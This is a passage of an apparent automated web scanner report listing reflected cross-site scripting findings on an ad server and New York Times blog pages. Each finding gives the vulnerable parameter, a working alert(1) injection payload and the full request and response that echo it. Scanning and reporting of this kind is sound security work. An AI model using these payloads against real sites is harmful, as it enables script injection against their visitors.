GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
va
...[SNIP]...

3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd88d'-alert(1)-'c98da69b678 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55441"-alert(1)-"1ff26f2efc9 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fs
...[SNIP]...

3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ddd'-alert(1)-'49ddae20877 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582d2"-alert(1)-"b947319b053 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFoun
...[SNIP]...

3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e573'-alert(1)-'e1385978014 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88f77"-alert(1)-"167dad5fe8 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6747

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12262'-alert(1)-'e4bd8929211 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5
...[SNIP]...

3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a865b"-alert(1)-"c0215a18d89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5
...[SNIP]...

3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5739.NYTimes.com/B4990972.8

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f6d'-alert(1)-'682c6ac4a6b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5739.NYTimes.com/B4990972.8;click=d0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 489
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 13 Nov 2010 01:48:43 GMT
Expires: Sat, 13 Nov 2010 01:48:43 GMT

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/f7/%2a/i;44306;0-0;0;56070716;1-468/60;0/0/0;;~sscs=%3fd0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0
...[SNIP]...

3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51dfc"><script>alert(1)</script>7dc7045992c was submitted in the src parameter. This input was echoed as 51dfc\"><script>alert(1)</script>7dc7045992c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/anatomy-of-a-scene-unstoppable/?src=dayp51dfc"><script>alert(1)</script>7dc7045992c HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.nytimes.com/

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:51:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 71408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;anatomy-of-a-scene;chris-pine;denzel-washington;movies;tony-scott;unstoppable&src=dayp51dfc\"><script>alert(1)</script>7dc7045992c">
...[SNIP]...

3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c201f"><script>alert(1)</script>e276354bf82 was submitted in the src parameter. This input was echoed as c201f\"><script>alert(1)</script>e276354bf82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?src=twrc201f"><script>alert(1)</script>e276354bf82 HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.nytimes.com/timeswire/index.html?src=hp1-0-R

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:48:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
Now4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;featured;hip-hop;kanye-west;matt-lauer;music;television;today&src=twrc201f\"><script>alert(1)</script>e276354bf82">
...[SNIP]...

3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521ab"><script>alert(1)</script>70bd4e176f0 was submitted in the src parameter. This input was echoed as 521ab\"><script>alert(1)</script>70bd4e176f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-week-in-culture-pictures-nov-12/?src=twr521ab"><script>alert(1)</script>70bd4e176f0 HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;arts-general;week-in-culture-pictures&src=twr521ab\"><script>alert(1)</script>70bd4e176f0">
...[SNIP]...

3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/art-design/

Issue detail

